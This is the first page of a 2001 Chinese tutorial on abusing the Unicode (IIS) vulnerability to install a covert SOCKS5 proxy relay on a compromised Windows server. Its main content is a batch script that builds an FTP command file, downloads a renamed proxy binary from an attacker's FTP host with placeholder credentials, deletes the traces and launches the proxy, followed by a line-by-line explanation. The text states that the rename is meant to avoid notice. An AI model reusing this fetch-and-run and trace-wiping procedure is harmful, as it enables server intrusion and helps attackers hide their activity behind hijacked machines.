您现在的位置是: E企业 > 安全之路 > 系统漏洞 > 正文




利用Unicode漏洞建立代理服务器
2001-06-25· ·Nicky ··安全卫士

1 2 3  下一页

  snake的sksockserver(代理跳板)是一个非常好的的 socks5 代理服务器。它非常小巧,才32K,但是可以比较完整的支持tcp协议和udp协议,也支持oicq,而且它具有将通信数据在各跳板之间加密的功能。这使我们能很好的掩盖自己网上踪迹。不过,使用它需要一定的服务器入侵知识,这对新手菜鸟是个很大的挑战。因此,我写下这篇文章,希望对大家有所帮助。

所需软件: 流光4 、 代理跳板:SkSockServer 、 代理猎手

准备工作:请申请一个 ftp 空间,现在的免费主页大都带有 ftp 空间的。假设申请的 ftp 空间地址为 ftp.server.com ,用户名为 tom ,密码是 pass 。将 SkSockServer.exe 改名为 char.exe 上传到 ftp 空间。改名的目的当然是为了不那么起眼,你随便改好了。

步骤:

一:在 C 盘根目录下面建立一个文本文件 pp.txt,内容如下:

echo open ftp.server.com>af.txt
echo tom>>af.txt
echo pass>>af.txt
echo bin>>af.txt
echo get char.exe>>af.txt
echo bye>>af.txt
ftp -s:af.txt
del a.txt
del af.txt
char -debug 5262

注意了,请用你的真实的 ftp 网站地址、用户名、密码代替上面的 ftp.server.com 、 tom 和 pass ,否则就不会成功的。现在来检查你的文件是否正确,复制一份 pp.txt ,将它的扩展名改为 bat ,即将文件改名为 pp.bat 。拨号上网,执行 pp.bat ,如果你没有写错,那在 pp.bat 所在目录下面应该会有一个 char.exe 。如果 char.exe 文件不在,检查你的网络连接是否正常,自己用 ftp 软件去看看自己的空间里面是否有 char.exe 这个文件。最重要的要检查 ftp 服务器有没有写错,用户名和密码是否正确。

我来解释一下这个文件的意思.如果你学过 dos ,就会很清楚上面pp.txt文件的作用了。

echo 命令是在屏幕上显示你输入的字符。如,在 dos 下面,输入echo hello,那它就会显示“hello”。

“ > ”是管道重定向符号,执行 dos 命令echo hello>a.txt,命令执行的结果是将 hello 写在一个 a.txt 文件上, 原先a.txt 文件的内容会被删掉,变成只有 hello 这个单词。如果 a.txt 文件不存在,那它会自己生成一个新文件。 “ >>" 和 ">" 不同的地方是它不会删掉文件原有的内容,只会在文件后面追加新内容。

好了,我们来看 pp.txt 文件执行的结果

echo open ftp.server.com>af.txt echo tom>>af.txt echo pass>>af.txt echo bin>>af.txt echo get char.exe>>af.txt echo bye>>af.txt

上面这几个命令执行的结果是在当前路径下生成一个 af.txt 文件,内容如下:
open ftp.server.com
tom
pass
bin
get char.exe
bye

然后是执行 ftp af.txt
这让系统调用 ftp 命令,下载 char.exe 文件。
下面的就没有什么好说了
分别是删除 a.txt , af.txt 文件,在 5262 端口上进行 socks5 服务。

1 2 3  下一页

■ 相关内容
 漏洞---看网吧管理软件
 网络管理员及攻击者的好帮手Wget使用详解
 让漏洞无处藏身-扫描工具大阅兵
 Unicode漏洞解决方案
 Unicode漏洞入侵图文讲解
 防止Outlook邮件被骗收
 Windows 2000漏洞集锦
 常见CGI漏洞及应对(二)
 常见CGI漏洞及应对(一)
 如何防止Windows远程共享漏洞
 利用Unicode漏洞进入Windows2000
 Microsoft IIS CGI文件名错误解码漏洞
 利用OutLook漏洞的蠕虫病毒
 Hotmail的严重安全漏洞
 使用扫描器导致 CISCO IOS 拒绝服务漏洞
 Win2K 提升权限漏洞
 黑客技巧--深入UNICODE编码漏洞(七)
 黑客技巧--深入UNICODE编码漏洞(八)
感谢 访问天极网,如果您觉得该文章涉及版权问题,请看这里!